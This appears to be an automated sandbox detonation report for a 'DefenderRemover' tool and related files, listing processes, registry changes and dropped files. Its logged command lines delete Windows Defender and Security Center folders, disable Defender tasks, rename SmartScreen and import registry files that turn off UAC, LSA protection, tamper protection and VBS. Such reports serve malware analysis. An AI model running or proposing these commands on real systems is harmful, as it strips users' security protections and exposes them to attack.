C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" /TI/ cmd.exe /c rmdir /s /q "C:\Windows\WinSxS\wow64_windows-defender*"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c rmdir /s /q "C:\Windows\WinSxS\amd64_windows-defender*"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" cmd.exe /c rmdir /s /q "C:\Windows\WinSxS\x86_windows-defender*"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
PowerRun.exe cmd.exe /c rmdir /s /q "C:\Windows\bcastdvr"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c rmdir /s /q "C:\Windows\WinSxS\wow64_windows-defender*"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" /TI/ cmd.exe /c rmdir /s /q "C:\Windows\WinSxS\x86_windows-defender*"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" cmd.exe /c rmdir /s /q "C:\Windows\bcastdvr"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
PowerRun.exe cmd.exe /c rmdir /s /q "C:\Windows\SystemApps\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c rmdir /s /q "C:\Windows\WinSxS\x86_windows-defender*"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" /TI/ cmd.exe /c rmdir /s /q "C:\Windows\bcastdvr"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" cmd.exe /c rmdir /s /q "C:\Windows\SystemApps\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy"
C:\Windows\SysWOW64\timeout.exe
timeout /t 5 /nobreak
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" /TI/ cmd.exe /c rmdir /s /q "C:\Windows\SystemApps\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c rmdir /s /q "C:\Windows\bcastdvr"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c rmdir /s /q "C:\Windows\SystemApps\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy"
C:\Windows\SysWOW64\shutdown.exe
shutdown /r /f /t 0
C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x4 /state0:0xa3970055 /state1:0x41c64e6d
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /K ISOCreator.cmd
Network
Files
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Script_Run.bat
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\TKL.txt
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
C:\Users\Admin\AppData\Local\Temp\4v2k6c8e.tmp
C:\Users\Admin\AppData\Local\Temp\aut6D68.tmp
C:\Users\Admin\AppData\Local\Temp\aut6D67.tmp
C:\Users\Admin\AppData\Local\Temp\aut6D56.tmp
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Antivirus_d.reg
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Defender Anti-Phishing_d.reg
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Disable Defender and Security Center Notifications.reg
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Disable Defender Policies.reg
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Disable LSA Protection.reg
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Disable Microsoft Vulnerabile Driver Blocklist.reg
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Disable SmartScreen.reg
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Disable System Mitigations.reg
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Disable Tamper Protection.reg
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Disable UAC.reg
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Disable VBS.reg
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Exploit Guard_d.reg
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\LockDown Windows Defender Security Center.reg
C:\Windows\Temp\1h1x2x8r.tmp
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Mitigation of Fault Torelant Heap.reg
C:\Users\Admin\AppData\Local\Temp\0llt8r0x.tmp
Analysis: behavioral8
Detonation Overview
Submitted
2024-06-09 22:02
Reported
2024-06-09 22:41
Platform
win11-20240426-en
Max time kernel
144s
Max time network
157s
Command Line
Signatures
Executes dropped EXE
Enumerates physical storage devices
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Users\Admin\AppData\Local\Temp\7zS7A50.tmp\PowerRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@%SystemRoot%\System32\ndfapi.dll,-40001 = "Windows Network Diagnostics" | C:\Users\Admin\AppData\Local\Temp\7zS7A50.tmp\PowerRun.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | C:\Users\Admin\AppData\Local\Temp\7zS7A50.tmp\PowerRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4290799360" | C:\Windows\system32\LogonUI.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Users\Admin\AppData\Local\Temp\7zS7A50.tmp\PowerRun.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = 99ebff004cc2ff000091f8000078d4000067c000003e9200001a6800f7630c00 | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Users\Admin\AppData\Local\Temp\7zS7A50.tmp\PowerRun.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | C:\Users\Admin\AppData\Local\Temp\7zS7A50.tmp\PowerRun.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292114432" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "183" | C:\Windows\system32\LogonUI.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Users\Admin\AppData\Local\Temp\7zS7A50.tmp\PowerRun.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | C:\Users\Admin\AppData\Local\Temp\7zS7A50.tmp\PowerRun.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292114432" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365268" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | C:\Users\Admin\AppData\Local\Temp\7zS7A50.tmp\PowerRun.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365268" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Users\Admin\AppData\Local\Temp\7zS7A50.tmp\PowerRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Users\Admin\AppData\Local\Temp\7zS7A50.tmp\PowerRun.exe | N/A |
Runs .reg file with regedit
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\regedit.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\LogonUI.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\Tutorial\DefenderRemover.exe
"C:\Users\Admin\AppData\Local\Temp\Tutorial\DefenderRemover.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c .\Script_Run.bat
C:\Users\Admin\AppData\Local\Temp\7zS7A50.tmp\PowerRun.exe
PowerRun.exe schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
C:\Users\Admin\AppData\Local\Temp\7zS7A50.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS7A50.tmp\PowerRun.exe" schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
C:\Users\Admin\AppData\Local\Temp\7zS7A50.tmp\PowerRun.exe
PowerRun.exe schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
C:\Users\Admin\AppData\Local\Temp\7zS7A50.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS7A50.tmp\PowerRun.exe" schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
C:\Users\Admin\AppData\Local\Temp\7zS7A50.tmp\PowerRun.exe
PowerRun.exe schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
C:\Users\Admin\AppData\Local\Temp\7zS7A50.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS7A50.tmp\PowerRun.exe" /TI/ schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
C:\Users\Admin\AppData\Local\Temp\7zS7A50.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS7A50.tmp\PowerRun.exe" /TI/ schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
C:\Users\Admin\AppData\Local\Temp\7zS7A50.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS7A50.tmp\PowerRun.exe" schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
C:\Users\Admin\AppData\Local\Temp\7zS7A50.tmp\PowerRun.exe
PowerRun.exe schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
C:\Users\Admin\AppData\Local\Temp\7zS7A50.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS7A50.tmp\PowerRun.exe" /TI/ schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
C:\Users\Admin\AppData\Local\Temp\7zS7A50.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS7A50.tmp\PowerRun.exe" schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
C:\Users\Admin\AppData\Local\Temp\7zS7A50.tmp\PowerRun.exe
PowerRun.exe regedit.exe /s "DisablerS\Disable.reg"
C:\Users\Admin\AppData\Local\Temp\7zS7A50.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS7A50.tmp\PowerRun.exe" /TI/ schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
C:\Users\Admin\AppData\Local\Temp\7zS7A50.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS7A50.tmp\PowerRun.exe" regedit.exe /s "DisablerS\Disable.reg"
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im smartscreen.exe
C:\Users\Admin\AppData\Local\Temp\7zS7A50.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS7A50.tmp\PowerRun.exe" /TI/ regedit.exe /s "DisablerS\Disable.reg"
C:\Windows\regedit.exe
"C:\Windows\regedit.exe" /s "DisablerS\Disable.reg"
C:\Users\Admin\AppData\Local\Temp\7zS7A50.tmp\PowerRun.exe
PowerRun.exe cmd.exe /c move /y "C:\Windows\System32\smartscreen.exe" "C:\Windows\System32\smartscreen.plm"
C:\Users\Admin\AppData\Local\Temp\7zS7A50.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS7A50.tmp\PowerRun.exe" cmd.exe /c move /y "C:\Windows\System32\smartscreen.exe" "C:\Windows\System32\smartscreen.plm"
C:\Windows\SysWOW64\timeout.exe
timeout /t 5 /nobreak
C:\Users\Admin\AppData\Local\Temp\7zS7A50.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS7A50.tmp\PowerRun.exe" /TI/ cmd.exe /c move /y "C:\Windows\System32\smartscreen.exe" "C:\Windows\System32\smartscreen.plm"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c move /y "C:\Windows\System32\smartscreen.exe" "C:\Windows\System32\smartscreen.plm"
C:\Windows\SysWOW64\shutdown.exe
shutdown /r /f /t 0
C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x4 /state0:0xa3a18855 /state1:0x41c64e6d
Network
Files
C:\Users\Admin\AppData\Local\Temp\7zS7A50.tmp\Script_Run.bat
C:\Users\Admin\AppData\Local\Temp\7zS7A50.tmp\PowerRun.exe
C:\Windows\Temp\1x6b0a0i.tmp
C:\Users\Admin\AppData\Local\Temp\aut92B3.tmp
C:\Users\Admin\AppData\Local\Temp\aut92B2.tmp
C:\Users\Admin\AppData\Local\Temp\aut92B1.tmp
C:\Windows\Temp\3x2b7a6i.tmp
C:\Users\Admin\AppData\Local\Temp\7zS7A50.tmp\DisablerS\Disable.reg
Analysis: behavioral9
Detonation Overview
Submitted
2024-06-09 22:02
Reported
2024-06-09 22:41
Platform
win11-20240508-en
Max time kernel
131s
Max time network
150s
Command Line
Signatures
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\Local Settings | C:\Windows\system32\cmd.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\bin\SilverBullet.Parallelization.pdb
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
Files
Analysis: behavioral25
Detonation Overview
Submitted
2024-06-09 22:02
Reported
2024-06-09 22:41
Platform
win11-20240419-en
Max time kernel
130s
Max time network
150s
Command Line
Signatures
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings | C:\Windows\system32\cmd.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\runtimes\iossimulator-arm64\native\libMono.Unix.a
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
Network
Files
Analysis: behavioral26
Detonation Overview
Submitted
2024-06-09 22:02
Reported
2024-06-09 22:40
Platform
win11-20240508-en
Max time kernel
75s
Max time network
94s
Command Line
Signatures
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings | C:\Windows\system32\cmd.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\runtimes\iossimulator-x64\native\libMono.Unix.a
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
Network
Files
Analysis: behavioral28
Detonation Overview
Submitted
2024-06-09 22:02
Reported
2024-06-09 22:40
Platform
win11-20240426-en
Max time kernel
75s
Max time network
92s
Command Line
Signatures
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2551177587-3778486488-1329702901-1000_Classes\Local Settings | C:\Windows\system32\cmd.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2551177587-3778486488-1329702901-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\runtimes\maccatalyst-x64\native\libMono.Unix.a
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
Network
Files
Analysis: behavioral29
Detonation Overview
Submitted
2024-06-09 22:02
Reported
2024-06-09 22:41
Platform
win11-20240426-en
Max time kernel
80s
Max time network
99s
Command Line
Signatures
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\Local Settings | C:\Windows\system32\cmd.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\runtimes\tvossimulator-x64\native\libMono.Unix.a
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
Network
| Country | Destination | Domain | Proto |
| IE | 52.111.236.22:443 | N/A | tcp |
Files
Analysis: behavioral30
Detonation Overview
Submitted
2024-06-09 22:02
Reported
2024-06-09 22:41
Platform
win11-20240426-en
Max time kernel
81s
Max time network
98s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\runtimes\win-arm\native\e_sqlite3.dll,#1
Network
Files
Analysis: behavioral10
Detonation Overview
Submitted
2024-06-09 22:02
Reported
2024-06-09 22:40
Platform
win11-20240508-en
Max time kernel
136s
Max time network
154s
Command Line
Signatures
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02 | C:\Windows\system32\OpenWith.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257" | C:\Windows\system32\OpenWith.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0 | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff | C:\Windows\system32\OpenWith.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1" | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0" | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202 | C:\Windows\system32\OpenWith.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings | C:\Windows\system32\cmd.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 00000000ffffffff | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 | C:\Windows\system32\OpenWith.exe | N/A |
| Key created | \Registry\User\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\NotificationData | C:\Windows\system32\OpenWith.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2 | C:\Windows\system32\OpenWith.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4" | C:\Windows\system32\OpenWith.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\MRUListEx = ffffffff | C:\Windows\system32\OpenWith.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0" | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0 = 5400310000000000a85824691000646f746e657400003e0009000400efbea8580a69a85824692e0000003961020000000500000000000000000000000000000064c42f0164006f0074006e0065007400000016000000 | C:\Windows\system32\OpenWith.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg | C:\Windows\system32\OpenWith.exe | N/A |
